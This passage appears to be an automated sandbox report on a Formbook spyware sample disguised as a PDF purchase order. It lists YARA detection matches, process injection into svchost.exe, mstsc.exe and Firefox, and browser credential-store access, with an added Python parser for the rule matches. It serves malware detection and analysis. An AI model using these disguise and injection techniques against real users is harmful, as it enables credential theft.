            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03D0A9A6
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03C49950
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03C5B950
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03C56962
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03C438E0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03C6E8F0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03C268B8
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03C42840
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03C4A840
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03CAD800
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03C32FC8
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03C4CFE0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03C41F92
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03CFFFB1
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03CB4F40
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03CFFF09
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03C82F28
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03C60F30
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03CFEEDB
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03C52E90
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03CFCE93
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03C49EB0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03C40E59
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03CFEE26
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03C5FDC0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03C3ADE0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03C58DBF
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03C43D40
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03CF1D5A
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03CF7D73
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03C4AD00
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03C30CF2
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03CFFCF2
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03CE0CB5
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03C40C00
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03CB9C32
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe  Code function: 3_2_0637A29E
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe  Code function: 3_2_0639E205
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045E2446
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_04521460
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045EF43F
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045DE4F6
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045E7571
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_04530535
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045F0591
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045CD5B0
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045E16CC
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_0454C6E0
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_04554750
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_04530770
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_0452C7C0
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045EF7B0
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045DF0CC
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045370C0
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045E70E9
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045EF0E0
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_0451F172
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045FB16B
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_0456516C
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045CA118
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_04520100
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045E81CC
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_0453B1B0
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045F01AA
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045D0274
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_0454B2C0
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045D12ED
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045352A0
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045EA352
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_0451D34C
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045E132D
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_0453E3F0
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045F03E6
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_0457739A
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_04530C00
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045A9C32
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_04520CF2
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045EFCF2
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045D0CB5
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045E1D5A
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_04533D40
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045E7D73
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_0453AD00
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_0454FDC0
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_0452ADE0
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_04548DBF
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_04530E59
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045EEE26
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045EEEDB
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_04542E90
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045ECE93
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_04539EB0
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045A4F40
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045EFF09
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_04550F30
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_04572F28
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_04522FC8
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_0453CFE0
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_04531F92
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045EFFB1
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_04532840
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_0453A840
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_0459D800
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_0455E8F0
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045338E0
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045168B8
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_04539950
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_0454B950
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_04546962
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045329A0
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045FA9A6
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045EFA49
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045E7A46
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045A3A6C
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045DDAC6
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_0452EA80
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045CDAAC
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_04575AA0
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045EAB40
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045EFB76
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_045E6BD7
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_0456DBF9
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_0454FB80
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_00491B50
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_004951E0
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_004933C0
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_004AB7B0
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_0048CA79
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_0048CA80
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_0048CCA0
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_0048AD20
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_00E5E378
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_00E5E495
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_00E6540C
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_00E5D898
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_00E5E833
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_00E5CA83
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_00E5CB58
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: 4_2_00E63F69
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: String function: 03C75130 appears 36 times
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: String function: 03C2B970 appears 268 times
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: String function: 03C87E54 appears 96 times
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: String function: 03CAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: String function: 03CBF290 appears 105 times
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: String function: 04577E54 appears 89 times
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: String function: 045AF290 appears 105 times
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: String function: 04565130 appears 36 times
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: String function: 0451B970 appears 268 times
            Source: C:\Windows\SysWOW64\mstsc.exe  Code function: String function: 0459EA12 appears 85 times
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe  Code function: String function: 00038A80 appears 39 times
            Source: PO-78140924.BAT.PDF.exe, 00000000.00000003.2042653624.0000000004663000.00000004.00001000.00020000.00000000.sdmp  Binary or memory string: OriginalFilenamentdll.dllj% vs PO-78140924.BAT.PDF.exe
            Source: PO-78140924.BAT.PDF.exe, 00000000.00000003.2041249097.000000000480D000.00000004.00001000.00020000.00000000.sdmp  Binary or memory string: OriginalFilenamentdll.dllj% vs PO-78140924.BAT.PDF.exe
            Source: PO-78140924.BAT.PDF.exe  Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE  Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE  Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3895831173.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3897012807.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3897058690.0000000000D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2158074372.0000000003B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3900775999.0000000006310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2157680976.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2158514500.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3897432800.0000000002360000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
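The "Matched rule" lines above are the most reusable part of this report: one Elastic rule (Windows_Trojan_Formbook_1112e116) hits in the unpacked svchost.exe image and in memory regions of processes 2, 3 and 4. The parser below is an added example, not part of the Joe Sandbox report or of Joe Security's tooling. It turns such lines into records and groups them per rule and per process, so the hits can be fed into a ticket or a hunt without hand-copying. The sample lines are copied from this report; the layout assumed for the dotted .sdmp names (process index, dump index, timestamp, base address, page protection, all zero-padded hex) is inferred from how the names read and is not documented here.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Win32 page-protection constants (winnt.h); PAGE_EXECUTE* all live in the high nibble.
PAGE_READWRITE = 0x04
PAGE_EXECUTE_READWRITE = 0x40

# Constructed input: four "Matched rule" lines copied from this report.
_META = ("reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, "
         "os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, "
         "license = Elastic License v2, threat_name = Windows.Trojan.Formbook, "
         "fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, "
         "id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23")
SAMPLE_LINES = [
    f"Source: {src}, type: {typ}  Matched rule: Windows_Trojan_Formbook_1112e116 {_META}"
    for src, typ in [
        ("2.2.svchost.exe.400000.0.unpack", "UNPACKEDPE"),
        ("00000004.00000002.3895831173.0000000000480000.00000040.80000000.00040000.00000000.sdmp", "MEMORY"),
        ("00000004.00000002.3897012807.0000000000D10000.00000004.00000800.00020000.00000000.sdmp", "MEMORY"),
        ("00000003.00000002.3900775999.0000000006310000.00000040.80000000.00040000.00000000.sdmp", "MEMORY"),
    ]
]

# Tolerates both "UNPACKEDPE  Matched rule" and the fused "UNPACKEDPEMatched rule" seen in raw extractions.
_LINE_RE = re.compile(r"^\s*Source:\s*(?P<src>.+?),\s*type:\s*(?P<type>[A-Z]+)\s*Matched rule:\s*"
                      r"(?P<rule>\S+)\s*(?P<meta>.*)$")
# "<proc>.<dump>.<image name>.<base hex>.<n>.unpack" or ".raw.unpack"
_UNPACK_RE = re.compile(r"^(\d+)\.(\d+)\.(.+?)\.([0-9A-Fa-f]+)\.(\d+)\.(?:raw\.)?unpack$")


@dataclass
class YaraMatch:
    source: str
    source_type: str
    rule: str
    meta: dict
    process_index: Optional[int] = None
    base_address: Optional[int] = None
    protection: Optional[int] = None

    @property
    def executable(self) -> bool:
        return self.protection is not None and (self.protection & 0xF0) != 0


def _parse_meta(text: str) -> dict:
    """Split 'k = v, k = v' but keep commas inside a value (scan_context = file, memory)."""
    meta = {}
    for chunk in re.split(r",\s+(?=\w+\s*=\s)", text.strip()):
        if " = " in chunk:
            key, value = chunk.split(" = ", 1)
            meta[key.strip()] = value.strip()
    return meta


def parse_match_line(line: str) -> Optional[YaraMatch]:
    mo = _LINE_RE.match(line)
    if not mo:
        return None
    m = YaraMatch(mo["src"], mo["type"], mo["rule"], _parse_meta(mo["meta"]))
    if m.source_type == "MEMORY" and m.source.endswith(".sdmp"):
        f = m.source.split(".")          # assumed field order, see lead-in
        if len(f) >= 5:
            m.process_index, m.base_address, m.protection = int(f[0], 16), int(f[3], 16), int(f[4], 16)
    else:
        um = _UNPACK_RE.match(m.source)
        if um:
            m.process_index, m.base_address = int(um.group(1)), int(um.group(4), 16)
    return m


def parse_report(lines):
    return [m for m in map(parse_match_line, lines) if m is not None]


def summarize(matches):
    """rule -> processes hit, number of hits, and how many hits sit in executable memory."""
    out = {}
    for m in matches:
        e = out.setdefault(m.rule, {"processes": set(), "hits": 0, "executable_regions": 0})
        e["hits"] += 1
        if m.process_index is not None:
            e["processes"].add(m.process_index)
        if m.source_type == "MEMORY" and m.executable:
            e["executable_regions"] += 1
    for e in out.values():
        e["processes"] = sorted(e["processes"])
    return out


if __name__ == "__main__":
    for rule, e in summarize(parse_report(SAMPLE_LINES)).items():
        print(rule, e)
```

The protection nibble is worth keeping: a rule that only fires in a PAGE_READWRITE heap region (process 4 at 0xD10000) usually means decrypted config or strings, while hits in PAGE_EXECUTE_READWRITE regions (0x480000 in process 4, 0x6310000 in process 3) are the injected code itself.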
            Source: classification engine  Classification label: mal100.troj.spyw.evad.winEXE@7/4@11/8
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe  Code function: 0_2_0007A0F4 GetLastError,FormatMessageW
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe  Code function: 0_2_00073C99 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe  Code function: 0_2_00014FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe  File created: C:\Users\user\AppData\Local\Temp\proximobuccal
            Source: C:\Program Files\Mozilla Firefox\firefox.exe  File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe  Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: mstsc.exe, 00000004.00000003.2346478807.0000000000713000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000004.00000003.2346272846.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000004.00000002.3896033202.0000000000740000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000004.00000003.2349393879.000000000071D000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000004.00000002.3896033202.0000000000713000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: PO-78140924.BAT.PDF.exe  ReversingLabs: Detection: 79%
            Source: unknown  Process created: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe "C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe"
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe  Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe"
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe  Process created: C:\Windows\SysWOW64\mstsc.exe "C:\Windows\SysWOW64\mstsc.exe"
            Source: C:\Windows\SysWOW64\mstsc.exe  Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe  Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe  Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe  Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe  Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe  Section loaded: version.dll
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe  Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe  Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe  Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe  Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe  Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe  Section loaded: wldp.dll
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe  Section loaded: wininet.dll
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe  Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe  Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe  Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe  Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe  Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\mstsc.exe  Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\mstsc.exe  Section loaded: credui.dll
            Source: C:\Windows\SysWOW64\mstsc.exe  Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\mstsc.exe  Section loaded: cryptui.dll
            Source: C:\Windows\SysWOW64\mstsc.exe  Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\mstsc.exe  Section loaded: version.dll
            Source: C:\Windows\SysWOW64\mstsc.exe  Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\mstsc.exe  Section loaded: winmm.dll
            Source: C:\Windows\SysWOW64\mstsc.exe  Section loaded: ktmw32.dll
            Source: C:\Windows\SysWOW64\mstsc.exe  Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\mstsc.exe  Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\mstsc.exe  Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\mstsc.exe  Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\mstsc.exe  Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\mstsc.exe  Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\mstsc.exe  Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\mstsc.exe  Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\mstsc.exe  Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\mstsc.exe  Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\mstsc.exe  Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\mstsc.exe  Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\mstsc.exe  Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\mstsc.exe  Section loaded: mlang.dll
